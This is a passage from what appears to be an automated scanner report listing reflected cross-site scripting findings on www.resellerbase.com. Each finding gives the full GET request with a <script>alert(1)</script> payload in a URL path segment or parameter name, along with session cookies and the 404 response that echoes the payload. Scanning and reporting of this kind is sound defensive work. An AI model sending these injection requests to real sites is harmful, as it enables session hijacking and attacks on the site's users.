X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/themes/kosmos/imagesad179<script>alert(1)</script>070a9b34b9d/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2458. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6cec4<script>alert(1)</script>6cfa2006af7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/themes/kosmos/images/rating6cec4<script>alert(1)</script>6cfa2006af7/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/themes/kosmos/images/rating6cec4<script>alert(1)</script>6cfa2006af7/0.gif was not found on this server.</p>
...[SNIP]...

2.2459. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4ec74<script>alert(1)</script>33fa16cd841 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/themes/kosmos/images/rating/0.gif4ec74<script>alert(1)</script>33fa16cd841 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/themes/kosmos/images/rating/0.gif4ec74<script>alert(1)</script>33fa16cd841 was not found on this server.</p>
...[SNIP]...

2.2460. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62f93<script>alert(1)</script>4339d342efd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/themes/kosmos/images/rating/0.gif?62f93<script>alert(1)</script>4339d342efd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/themes/kosmos/images/rating/0.gif?62f93<script>alert(1)</script>4339d342efd=1 was not found on this server.</p>
...[SNIP]...

2.2461. http://www.resellerbase.com/detail/37/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67183<script>alert(1)</script>584f0c36064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail67183<script>alert(1)</script>584f0c36064/37/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail67183<script>alert(1)</script>584f0c36064/37/ was not found on this server.</p>
...[SNIP]...

2.2462. http://www.resellerbase.com/detail/37/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73b16<script>alert(1)</script>cb84df5cdbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3773b16<script>alert(1)</script>cb84df5cdbc/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3773b16<script>alert(1)</script>cb84df5cdbc/ was not found on this server.</p>
...[SNIP]...

2.2463. http://www.resellerbase.com/detail/37/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8cfe5<script>alert(1)</script>d18e9a2de3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/?8cfe5<script>alert(1)</script>d18e9a2de3b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/?8cfe5<script>alert(1)</script>d18e9a2de3b=1 was not found on this server.</p>
...[SNIP]...

2.2464. http://www.resellerbase.com/detail/37/neondollars-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/neondollars-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f8d4e<script>alert(1)</script>4296fc59fbe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf8d4e<script>alert(1)</script>4296fc59fbe/37/neondollars-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf8d4e<script>alert(1)</script>4296fc59fbe/37/neondollars-com.html was not found on this server.</p>
...[SNIP]...

2.2465. http://www.resellerbase.com/detail/37/neondollars-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/neondollars-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3ed29<script>alert(1)</script>81e14efb85a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/3ed29<script>alert(1)</script>81e14efb85a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/3ed29<script>alert(1)</script>81e14efb85a was not found on this server.</p>
...[SNIP]...

2.2466. http://www.resellerbase.com/detail/37/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50261<script>alert(1)</script>4ff259c321f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail50261<script>alert(1)</script>4ff259c321f/37/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail50261<script>alert(1)</script>4ff259c321f/37/rating.php was not found on this server.</p>
...[SNIP]...

2.2467. http://www.resellerbase.com/detail/37/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3f947<script>alert(1)</script>5613e7656dec004e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail3f947<script>alert(1)</script>5613e7656dec004e/37/rating.php?id=37&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3f947<script>alert(1)</script>5613e7656dec004e/37/rating.php?id=37&rating=5 was not found on this server.</p>
...[SNIP]...

2.2468. http://www.resellerbase.com/detail/37/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8858c<script>alert(1)</script>67d85bf080f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/378858c<script>alert(1)</script>67d85bf080f/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/378858c<script>alert(1)</script>67d85bf080f/rating.php was not found on this server.</p>
...[SNIP]...

2.2469. http://www.resellerbase.com/detail/37/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 275ca<script>alert(1)</script>2b31dc069f3600329 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/37275ca<script>alert(1)</script>2b31dc069f3600329/rating.php?id=37&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37275ca<script>alert(1)</script>2b31dc069f3600329/rating.php?id=37&rating=5 was not found on this server.</p>
...[SNIP]...

2.2470. http://www.resellerbase.com/detail/37/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b825e<script>alert(1)</script>927a49be0ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/rating.phpb825e<script>alert(1)</script>927a49be0ba HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/rating.phpb825e<script>alert(1)</script>927a49be0ba was not found on this server.</p>
...[SNIP]...

2.2471. http://www.resellerbase.com/detail/37/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6cf5e<script>alert(1)</script>34702f2cd0121c68e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; it could be converted to GET, which makes the attack easier to demonstrate and deliver.

Request

GET /detail/37/rating.php6cf5e<script>alert(1)</script>34702f2cd0121c68e?id=37&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/rating.php6cf5e<script>alert(1)</script>34702f2cd0121c68e?id=37&rating=5 was not found on this server.</p>
...[SNIP]...

2.2472. http://www.resellerbase.com/detail/37/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ddbd6<script>alert(1)</script>7393d751167 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/rating.php?ddbd6<script>alert(1)</script>7393d751167=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/rating.php?ddbd6<script>alert(1)</script>7393d751167=1 was not found on this server.</p>
...[SNIP]...

2.2473. http://www.resellerbase.com/detail/37/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e68db<script>alert(1)</script>fa22e02323c013df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; it could be converted to GET, which makes the attack easier to demonstrate and deliver.

Request

GET /detail/37/rating.php/e68db<script>alert(1)</script>fa22e02323c013df?id=37&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/rating.php/e68db<script>alert(1)</script>fa22e02323c013df?id=37&rating=5 was not found on this server.</p>
...[SNIP]...

2.2474. http://www.resellerbase.com/detail/37/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87b29<script>alert(1)</script>b04d30ae440 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail87b29<script>alert(1)</script>b04d30ae440/37/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail87b29<script>alert(1)</script>b04d30ae440/37/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2475. http://www.resellerbase.com/detail/37/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 787f7<script>alert(1)</script>3e57e7d7957 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37787f7<script>alert(1)</script>3e57e7d7957/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37787f7<script>alert(1)</script>3e57e7d7957/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2476. http://www.resellerbase.com/detail/37/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/37/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b9173<script>alert(1)</script>aea45563488 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/search.phpb9173<script>alert(1)</script>aea45563488?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/search.phpb9173<script>alert(1)</script>aea45563488?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2477. http://www.resellerbase.com/detail/37/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/37/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 32263<a>1b95818d01a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

